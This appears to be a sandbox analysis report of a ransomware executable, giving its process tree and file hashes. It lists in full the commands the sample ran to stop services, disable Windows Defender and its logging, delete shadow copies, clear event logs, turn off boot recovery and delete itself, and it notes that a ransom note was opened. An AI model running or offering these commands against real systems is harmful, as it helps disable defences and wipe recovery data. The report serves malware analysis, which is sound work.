3756 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3756 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3084 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3084 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3176 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3176 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 428 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 428 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3860 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3860 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3000 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe PID 3976 wrote to memory of 3000 3976 0e4d44dde522c07d09d9e3086cfae803.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:5116
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4676
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2332
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1580
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:204
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3576
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3532
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_19f65" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_19f65" /y3⤵PID:4952
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1812
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:4412
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_19f65" start= disabled2⤵
- Launches sc.exe
PID:3772
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3868
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:4948
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3756
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3084
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3176
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:428
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3860
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3000
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4732
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4188
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2320
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1100
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1608
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2016
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:460
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4916
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1124
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1400
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1784
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1632
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1412
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3148
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:4940
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3832
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3400
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1004
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1272
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1144
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3804
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4508
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4148
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2200
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4332
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1264
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5100
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4992
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4984
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
-
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2340
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"2⤵PID:4144
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:4896
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
1KB
MD5d3eca3baec61c36c9353ef1699b8bfca
SHA1f084193262e0d462165cfac58e1422ab90df7514
SHA2563ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
SHA5128d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17